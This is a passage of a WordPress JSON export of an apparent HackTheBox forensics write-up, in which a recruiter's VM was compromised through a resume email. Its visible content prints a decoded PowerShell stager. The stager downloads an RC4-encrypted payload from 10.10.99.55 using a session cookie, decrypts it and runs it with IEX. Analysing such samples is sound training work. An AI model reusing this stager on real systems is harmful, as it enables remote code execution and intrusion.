Gecko';$wC.HeaDerS.Add('User-Agent',$u);$Wc.PRoXy=[SysTeM.NET.WebRequEst]::DefaULtWeBPROXY;$wC.PRoXY.CREDeNtIaLS = [SYSTeM.NET.CreDEnTiaLCaChe]::DeFauLTNEtwOrkCredentiAlS;$K=[SYStEM.Text.ENCODIng]::ASCII.GEtBytEs('E1gMGdfT@eoN>x9{]2F7+bsOn4\/SiQrw');$R={$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxoR$S[($S[$I]+$S[$H])%256]}};$wc.HEAdErs.ADD(\"Cookie\",\"session=MCahuQVfz0yM6VBe8fzV9t9jomo=\");$ser='http:\/\/10.10.99.55:80';$t='\/login\/process.php';$flag='HTB{$_j0G_y0uR_M3m0rY_$}'<\/mark>;$DatA=$WC.DoWNLoaDDATA($SeR+$t);$iv=$daTA[0..3];$DAta=$DaTa[4..$DAta.LenGTH];-JOIN[CHAr[]](& $R $datA ($IV+$K))|IEX<\/pre>\n\n\n\n<\/p>\n","protected":false},"excerpt":{"rendered":"
Challenge brief Suspicious traffic was detected from a recruiter’s virtual PC. A memory dump of the offending VM was captured before it was removed from the network for imaging and analysis. Our recruiter mentioned he received an email from someone regarding their resume. A copy of the email was recovered and is provided for reference. […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[5],"tags":[],"class_list":["post-110","post","type-post","status-publish","format-standard","hentry","category-hackthebox-challenges"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=110"}],"version-history":[{"count":8,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/110\/revisions"}],"predecessor-version":[{"id":132,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/110\/revisions\/132"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}